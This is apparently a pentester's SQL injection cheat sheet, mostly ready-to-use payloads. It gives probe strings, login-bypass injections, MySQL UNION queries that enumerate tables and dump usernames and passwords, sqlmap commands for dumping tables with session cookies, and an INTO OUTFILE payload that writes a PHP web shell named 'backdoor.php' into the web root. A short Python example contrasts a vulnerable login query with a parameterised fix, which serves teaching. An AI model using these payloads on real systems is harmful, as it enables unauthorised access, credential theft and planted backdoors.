# SQL injection

## Basic technique

Stick `'` in a parameter and see if it throws a database error (and note what kind: the error text usually tells you which database engine you are dealing with).

Another simple test:

```
' or '1'='1
```

Other tests:

```
-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
```

### POST parameters

You can also attempt to inject parameters passed in POST requests, but you'll need an intercepting proxy such as Burp, or the Firefox tamper extension, to view and edit them. For example, you can test a parameter by adding a `'` at the end, like `lang=en'`.

## Bypassing authentication

If you find a poorly sanitized login page, you can attempt to log in without credentials by injecting into the username parameter:

```
username' or 1=1;#
username'-
```
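As an added example (not from the original notes), here is a Python/sqlite3 model of the login check above: the vulnerable string-built query next to its parameterised fix, exercised with the lone-quote probe and the `' or '1'='1` tautology from the basic-technique section (SQLite has no MySQL-style `#` comment, so that payload stands in for `;#`). The table, column and user names are constructed for the fixture.

```python
import sqlite3

def make_db():
    # Constructed in-memory stand-in for an app's users table (names assumed).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn

def login_vulnerable(conn, username, password):
    # The bug: input is spliced into the SQL text, so a quote in the input
    # closes the string literal and whatever follows is parsed as SQL.
    sql = ("SELECT name FROM users WHERE name = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(conn, username, password):
    # The fix: placeholders. Values are bound by the driver, so a quote is
    # just a character in the data and can never change the query's shape.
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

def probe(login, username, password):
    """Run one login attempt against a fresh fixture and report the outcome:
    the user it logged in as, None for a denied login, or "error" when the
    input broke the SQL (what the lone-quote test on the page looks for)."""
    conn = make_db()
    try:
        return login(conn, username, password)
    except sqlite3.OperationalError:
        return "error"
    finally:
        conn.close()

if __name__ == "__main__":
    quote = "'"
    tautology = "' or '1'='1"
    for label, login in (("vulnerable", login_vulnerable), ("safe", login_safe)):
        print(f"{label:10} lone quote -> {probe(login, quote, 'x')!r}")
        print(f"{label:10} tautology  -> {probe(login, tautology, tautology)!r}")
        print(f"{label:10} real creds -> {probe(login, 'alice', 's3cret')!r}")
```

The vulnerable version errors on the lone quote and logs the tautology in as the first user; the parameterised version treats both inputs as plain (non-matching) strings.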

## Database enumeration

The exact syntax for injection will vary by database type. In most lab scenarios, the database will be MySQL.

Get version:

```
http://[host]/inject.php?id=1 union all select 1,2,3,@@version,5
```

You can get the number of columns through trial and error using `order by`. Increase the column number one query at a time until the database throws an unknown column error; the last value that did not error is the column count, and your `union select` must supply exactly that many columns:

```
http://[host]/inject.php?id=54 order by 1
http://[host]/inject.php?id=54 order by 2
http://[host]/inject.php?id=54 order by 3
```

Get the current user:

```
http://[host]/inject.php?id=1 union all select 1,2,3,user(),5
```

See all tables:

```
http://[host]/inject.php?id=1 union all select 1,2,3,table_name,5 FROM information_schema.tables
```

Get column names for a specified table:

```
http://[host]/inject.php?id=1 union all select 1,2,3,column_name,5 FROM information_schema.columns where table_name='users'
```

Get usernames and passwords (`0x3A` is the hex value of `:`, used as a separator in the concatenated output):

```
http://[host]/inject.php?id=1 union all select 1,2,3,concat(name, 0x3A , password),5 from users
```

Depending on the database user's permission level, you might be able to write to system files using MySQL's `SELECT ... INTO OUTFILE` clause to create a PHP shell in the web root:

```
http://[host]/inject.php?id=54 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
```

I suspect you could inject a full reverse shell in there too...

## SQLmap

Assuming you've tested a parameter with `'` and it is injectable, run sqlmap against the URL:

```
sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --dbms=mysql
```

It may not find the injection unless you specify the database type.

Get the databases:

```
sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --dbs --dbms=mysql
```

Get the tables in a database:

```
sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --tables -D [database name]
```

Get the columns in a table:

```
sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --columns -D [database name] -T [table name]
```

Dump a table:

```
sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --dump -D [database name] -T [table name]
```

### Passing tokens

If the injection point isn't reachable from a bare URL (for example, it needs session cookies or a logged-in user), you can pass the cookie data or authentication credentials to sqlmap by pasting the full POST request into a file and using the `-r` option:

```
sqlmap -r request.txt
```

If you just need to pass a cookie:

```
sqlmap -u "http://[host]/inject.php" --cookie "PHPSESSID=foobar"
```

### REST-style URLs

If your URLs carry their values as path segments rather than query parameters, you can still test them by marking each injection point with `*`:

```
sqlmap -u "http://[host]/param1*/param2*"
```

## Further reading

* [Gaining a reverse shell from SQL injection](https://resources.infosecinstitute.com/anatomy-of-an-attack-gaining-reverse-shell-from-sql-injection/)
* [SQL injection cheat sheet](http://pentestmonkey.net/category/cheat-sheet/sql-injection)
* [Dumping a complete database using SQL injection](https://resources.infosecinstitute.com/dumping-a-database-using-sql-injection/#gref)
* [Hacking node.js and MongoDB](https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html)
* [SQLmap tutorial](https://www.binarytides.com/sqlmap-hacking-tutorial/)
